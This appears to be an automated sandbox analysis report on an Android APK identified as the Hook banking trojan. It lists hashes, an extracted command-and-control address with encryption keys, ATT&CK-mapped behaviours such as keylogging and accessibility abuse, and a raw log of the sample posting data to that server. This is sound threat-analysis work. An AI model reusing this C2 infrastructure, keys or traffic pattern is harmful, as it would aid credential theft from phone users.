hook | e012d239d54312fab54c679208e0a9f8c9ffac061b5f740febc6b0589b299ca0

Analysis

max time kernel
148s
max time network
152s
platform
android-11_x64
resource
android-x64-arm64-20240910-en
resource tags

arch:armarch:arm64arch:x64arch:x86image:android-x64-arm64-20240910-enlocale:en-usos:android-11-x64system
submitted
07/09/2024, 22:05 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e012d239d54312fab54c679208e0a9f8c9ffac061b5f740febc6b0589b299ca0.apk
Size

4.4MB
MD5

411e5bb9c35797745c00f2e2345bafec
SHA1

bce6ad2b1e2d72fca89fb46921ae9e3b400bd3f4
SHA256

e012d239d54312fab54c679208e0a9f8c9ffac061b5f740febc6b0589b299ca0
SHA512

acabc36e543695075ad300801d1eae6d13d156dc5febaa2a35d6238ff629ec794215d7335bd01ecf2c887400b0815ce191a557459811badd17aad89914bd2e3b
SSDEEP

98304:Wg2IPacQMawnAh6SDSztmZT5C7u9MqFq3gPUrkqXm6srR3faKAkSGc/STDm:TPyMawvdRmbCaJerkqudLSZCK

Score

10^/10

hook banker collection credential_access discovery evasion execution impact infostealer persistence rat trojan

Malware Config

Extracted

Family

hook

http://80.64.30.123

DES_key

1
676773656b6c6562

AES_key

1
374b396842365a4777623946726e3152487379577256426b783361594c704543

Signatures

Hook
Hook is an Android malware that is based on Ermac with RAT capabilities.
rat trojan infostealer hook

Loads dropped Dex/Jar 1 TTPs 2 IoCs

Runs executable file dropped to the device during analysis.

evasion

Download New Code at Runtime

T1407

ioc	pid	Process
/data/user/0/com.karqksqxc.mebijyvnp/app_dex/classes.dex	4837	com.karqksqxc.mebijyvnp
/data/user/0/com.karqksqxc.mebijyvnp/app_dex/classes.dex	4837	com.karqksqxc.mebijyvnp

Makes use of the framework's Accessibility service 4 TTPs 3 IoCs

Retrieves information displayed on the phone screen using AccessibilityService.

collection evasion credential_access

Input Injection

T1516

Screen Capture

T1513

Keylogging

T1417.001

GUI Input Capture

T1417.002

description	ioc	Process
Framework service call	android.accessibilityservice.IAccessibilityServiceConnection.findAccessibilityNodeInfoByAccessibilityId	com.karqksqxc.mebijyvnp
Framework service call	android.accessibilityservice.IAccessibilityServiceConnection.findAccessibilityNodeInfosByText	com.karqksqxc.mebijyvnp
Framework service call	android.accessibilityservice.IAccessibilityServiceConnection.findAccessibilityNodeInfosByViewId	com.karqksqxc.mebijyvnp

Obtains sensitive information copied to the device clipboard 2 TTPs 1 IoCs

Application may abuse the framework's APIs to obtain sensitive information copied to the device clipboard.

collection credential_access impact

Clipboard Data

T1414

Transmitted Data Manipulation

T1641.001

description	ioc	Process
Framework service call	android.content.IClipboard.addPrimaryClipChangedListener	com.karqksqxc.mebijyvnp

Queries a list of all the installed applications on the device (Might be used in an attempt to overlay legitimate apps) 1 TTPs
banker discovery

Security Software Discovery
T1418.001

Queries information about running processes on the device 1 TTPs 1 IoCs

Application may abuse the framework's APIs to collect information about running processes on the device.

discovery

Process Discovery

T1424

description	ioc	Process
Framework service call	android.app.IActivityManager.getRunningAppProcesses	com.karqksqxc.mebijyvnp

Queries the phone number (MSISDN for GSM devices) 1 TTPs
discovery

System Network Configuration Discovery
T1422

Acquires the wake lock 1 IoCs

description	ioc	Process
Framework service call	android.os.IPowerManager.acquireWakeLock	com.karqksqxc.mebijyvnp

Makes use of the framework's foreground persistence service 1 TTPs 1 IoCs

Application may abuse the framework's foreground service to continue running in the foreground.

evasion persistence

Foreground Persistence

T1541

description	ioc	Process
Framework service call	android.app.IActivityManager.setServiceForeground	com.karqksqxc.mebijyvnp

Performs UI accessibility actions on behalf of the user 1 TTPs 18 IoCs

Application may abuse the accessibility service to prevent their removal.

evasion

Prevent Application Removal

T1629.001

ioc	Process
android.accessibilityservice.IAccessibilityServiceConnection.performGlobalAction	com.karqksqxc.mebijyvnp
android.accessibilityservice.IAccessibilityServiceConnection.performGlobalAction	com.karqksqxc.mebijyvnp
android.accessibilityservice.IAccessibilityServiceConnection.performGlobalAction	com.karqksqxc.mebijyvnp
android.accessibilityservice.IAccessibilityServiceConnection.performGlobalAction	com.karqksqxc.mebijyvnp
android.accessibilityservice.IAccessibilityServiceConnection.performGlobalAction	com.karqksqxc.mebijyvnp
android.accessibilityservice.IAccessibilityServiceConnection.performGlobalAction	com.karqksqxc.mebijyvnp
android.accessibilityservice.IAccessibilityServiceConnection.performGlobalAction	com.karqksqxc.mebijyvnp
android.accessibilityservice.IAccessibilityServiceConnection.performGlobalAction	com.karqksqxc.mebijyvnp
android.accessibilityservice.IAccessibilityServiceConnection.performGlobalAction	com.karqksqxc.mebijyvnp
android.accessibilityservice.IAccessibilityServiceConnection.performGlobalAction	com.karqksqxc.mebijyvnp
android.accessibilityservice.IAccessibilityServiceConnection.performGlobalAction	com.karqksqxc.mebijyvnp
android.accessibilityservice.IAccessibilityServiceConnection.performGlobalAction	com.karqksqxc.mebijyvnp
android.accessibilityservice.IAccessibilityServiceConnection.performGlobalAction	com.karqksqxc.mebijyvnp
android.accessibilityservice.IAccessibilityServiceConnection.performGlobalAction	com.karqksqxc.mebijyvnp
android.accessibilityservice.IAccessibilityServiceConnection.performGlobalAction	com.karqksqxc.mebijyvnp
android.accessibilityservice.IAccessibilityServiceConnection.performGlobalAction	com.karqksqxc.mebijyvnp
android.accessibilityservice.IAccessibilityServiceConnection.performGlobalAction	com.karqksqxc.mebijyvnp
android.accessibilityservice.IAccessibilityServiceConnection.performGlobalAction	com.karqksqxc.mebijyvnp

Queries information about the current Wi-Fi connection 1 TTPs 1 IoCs

Application may abuse the framework's APIs to collect information about the current Wi-Fi connection.

discovery

System Network Connections Discovery

T1421

description	ioc	Process
Framework service call	android.net.wifi.IWifiManager.getConnectionInfo	com.karqksqxc.mebijyvnp

Reads information about phone network operator. 1 TTPs
discovery

System Network Configuration Discovery
T1422

Requests accessing notifications (often used to intercept notifications before users become aware). 1 TTPs 1 IoCs

collection credential_access

Access Notifications

T1517

description	ioc	Process
Intent action	android.settings.ACTION_NOTIFICATION_LISTENER_SETTINGS	com.karqksqxc.mebijyvnp

Schedules tasks to execute at a specified time 1 TTPs 1 IoCs

Application may abuse the framework's APIs to perform task scheduling for initial or recurring execution of malicious code.

execution persistence

Scheduled Task/Job

T1603

description	ioc	Process
Framework service call	android.app.job.IJobScheduler.schedule	com.karqksqxc.mebijyvnp

Uses Crypto APIs (Might try to encrypt user data) 1 TTPs 1 IoCs

impact

Data Encrypted for Impact

T1471

description	ioc	Process
Framework API call	javax.crypto.Cipher.doFinal	com.karqksqxc.mebijyvnp

Checks CPU information 2 TTPs 1 IoCs

System Checks

T1633.001

System Information Discovery

T1426

description	ioc	Process
File opened for read	/proc/cpuinfo	com.karqksqxc.mebijyvnp

Checks memory information 2 TTPs 1 IoCs

System Checks

T1633.001

System Information Discovery

T1426

description	ioc	Process
File opened for read	/proc/meminfo	com.karqksqxc.mebijyvnp

com.karqksqxc.mebijyvnp
1⤵
- Loads dropped Dex/Jar
- Makes use of the framework's Accessibility service
- Obtains sensitive information copied to the device clipboard
- Queries information about running processes on the device
- Acquires the wake lock
- Makes use of the framework's foreground persistence service
- Performs UI accessibility actions on behalf of the user
- Queries information about the current Wi-Fi connection
- Requests accessing notifications (often used to intercept notifications before users become aware).
- Schedules tasks to execute at a specified time
- Uses Crypto APIs (Might try to encrypt user data)
- Checks CPU information
- Checks memory information
PID:4837

Network

DNS

www.youtube.com

Remote address:

1.1.1.1:53

Request

www.youtube.com

IN A

Response

www.youtube.com

IN CNAME

youtube-ui.l.google.com

youtube-ui.l.google.com

IN A

172.217.169.78

youtube-ui.l.google.com

IN A

172.217.16.238

youtube-ui.l.google.com

IN A

216.58.212.238

youtube-ui.l.google.com

IN A

142.250.200.14

youtube-ui.l.google.com

IN A

172.217.169.14

youtube-ui.l.google.com

IN A

142.250.200.46

youtube-ui.l.google.com

IN A

216.58.201.110

youtube-ui.l.google.com

IN A

142.250.187.238

youtube-ui.l.google.com

IN A

216.58.213.14

youtube-ui.l.google.com

IN A

142.250.179.238

youtube-ui.l.google.com

IN A

172.217.169.46

youtube-ui.l.google.com

IN A

216.58.204.78

youtube-ui.l.google.com

IN A

142.250.180.14

youtube-ui.l.google.com

IN A

142.250.178.14

youtube-ui.l.google.com

IN A

142.250.187.206

youtube-ui.l.google.com

IN A

216.58.212.206
DNS

www.youtube.com

Remote address:

1.1.1.1:53

Request

www.youtube.com

IN A
GET

http://80.64.30.123/socket.io/?EIO=3&transport=polling

Remote address:

80.64.30.123:80

Request

GET /socket.io/?EIO=3&transport=polling HTTP/1.1
Accept: */*
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: okhttp/3.8.1

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: application/octet-stream
Date: Tue, 10 Sep 2024 08:53:05 GMT
Content-Length: 86
GET

http://80.64.30.123/socket.io/?EIO=3&transport=polling&sid=98a5

Remote address:

80.64.30.123:80

Request

GET /socket.io/?EIO=3&transport=polling&sid=98a5 HTTP/1.1
Accept: */*
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: okhttp/3.8.1

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: application/octet-stream
Date: Tue, 10 Sep 2024 08:53:05 GMT
Content-Length: 5
POST

http://80.64.30.123/socket.io/?EIO=3&transport=polling&sid=98a5

Remote address:

80.64.30.123:80

Request

POST /socket.io/?EIO=3&transport=polling&sid=98a5 HTTP/1.1
Accept: */*
Content-Type: text/plain;charset=UTF-8
Content-Length: 66
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: okhttp/3.8.1

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Date: Tue, 10 Sep 2024 08:53:06 GMT
Content-Length: 2
Content-Type: text/plain; charset=utf-8
GET

http://80.64.30.123/socket.io/?EIO=3&transport=websocket&sid=98a5

Remote address:

80.64.30.123:80

Request

GET /socket.io/?EIO=3&transport=websocket&sid=98a5 HTTP/1.1
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Key: p1HFXPha/k+GRvFsuLQqWA==
Sec-WebSocket-Version: 13
Host: 80.64.30.123
Accept-Encoding: gzip
User-Agent: okhttp/3.8.1

Response

HTTP/1.1 101 Switching Protocols

Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: u/I4KgW9fhF/FeCa5DFc7KhlveE=
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Origin: https://localhost:45051//
GET

http://80.64.30.123/socket.io/?EIO=3&transport=polling&sid=98a5

Remote address:

80.64.30.123:80

Request

GET /socket.io/?EIO=3&transport=polling&sid=98a5 HTTP/1.1
Accept: */*
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: okhttp/3.8.1

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: application/octet-stream
Date: Tue, 10 Sep 2024 08:53:06 GMT
Content-Length: 4
DNS

ssl.google-analytics.com

Remote address:

1.1.1.1:53

Request

ssl.google-analytics.com

IN A

Response

ssl.google-analytics.com

IN A

142.250.187.232
POST

http://80.64.30.123/php/q05v1txzdu7xhumg.php/

Remote address:

80.64.30.123:80

Request

POST /php/q05v1txzdu7xhumg.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 758
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:53:06 GMT
Content-Length: 24
POST

http://80.64.30.123/php/xx042i6r27.php/

Remote address:

80.64.30.123:80

Request

POST /php/xx042i6r27.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 888
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:53:07 GMT
Content-Length: 108
POST

http://80.64.30.123/php/1t1jkdwm94uww9zm.php/

Remote address:

80.64.30.123:80

Request

POST /php/1t1jkdwm94uww9zm.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 154
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:53:07 GMT
Transfer-Encoding: chunked
POST

http://80.64.30.123/php/ly0jt74muk0lwv.php/

Remote address:

80.64.30.123:80

Request

POST /php/ly0jt74muk0lwv.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 325
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:53:11 GMT
Content-Length: 24
POST

http://80.64.30.123/php/2nzo3p.php/

Remote address:

80.64.30.123:80

Request

POST /php/2nzo3p.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 758
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:53:13 GMT
Content-Length: 24
POST

http://80.64.30.123/php/fefqi.php/

Remote address:

80.64.30.123:80

Request

POST /php/fefqi.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 390
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:53:13 GMT
Content-Length: 24
POST

http://80.64.30.123/php/hx8u.php/

Remote address:

80.64.30.123:80

Request

POST /php/hx8u.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 90
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:53:38 GMT
Content-Length: 236
POST

http://80.64.30.123/php/dvtmdqcihvg00o01hej.php/

Remote address:

80.64.30.123:80

Request

POST /php/dvtmdqcihvg00o01hej.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 175
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:53:43 GMT
Content-Length: 24
POST

http://80.64.30.123/php/vmpm71pch5wise.php/

Remote address:

80.64.30.123:80

Request

POST /php/vmpm71pch5wise.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 240
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:53:44 GMT
Content-Length: 24
POST

http://80.64.30.123/php/ml6v5pmq3287.php/

Remote address:

80.64.30.123:80

Request

POST /php/ml6v5pmq3287.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 90
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:53:48 GMT
Content-Length: 88
POST

http://80.64.30.123/php/d184z6f8xvzq0.php/

Remote address:

80.64.30.123:80

Request

POST /php/d184z6f8xvzq0.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 90
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:53:51 GMT
Content-Length: 88
POST

http://80.64.30.123/php/bkucdlm.php/

Remote address:

80.64.30.123:80

Request

POST /php/bkucdlm.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 90
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:53:55 GMT
Content-Length: 88
POST

http://80.64.30.123/php/jdy1zzq.php/

Remote address:

80.64.30.123:80

Request

POST /php/jdy1zzq.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 90
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:53:58 GMT
Content-Length: 88
POST

http://80.64.30.123/php/2km9bl24ir.php/

Remote address:

80.64.30.123:80

Request

POST /php/2km9bl24ir.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 90
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:54:01 GMT
Content-Length: 88
POST

http://80.64.30.123/php/c4tzc2u4hmg7logxub4.php/

Remote address:

80.64.30.123:80

Request

POST /php/c4tzc2u4hmg7logxub4.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 90
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:54:04 GMT
Content-Length: 88
POST

http://80.64.30.123/php/qii76zua7xa8o46.php/

Remote address:

80.64.30.123:80

Request

POST /php/qii76zua7xa8o46.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 90
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:54:07 GMT
Content-Length: 88
POST

http://80.64.30.123/php/p8km5h8quxs.php/

Remote address:

80.64.30.123:80

Request

POST /php/p8km5h8quxs.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 90
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:54:10 GMT
Content-Length: 88
POST

http://80.64.30.123/php/jm609n.php/

Remote address:

80.64.30.123:80

Request

POST /php/jm609n.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 90
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:54:13 GMT
Content-Length: 88
POST

http://80.64.30.123/php/y8inwdv1nsl272zf3s7.php/

Remote address:

80.64.30.123:80

Request

POST /php/y8inwdv1nsl272zf3s7.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 90
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:54:16 GMT
Content-Length: 88
POST

http://80.64.30.123/php/5k2kgmqs.php/

Remote address:

80.64.30.123:80

Request

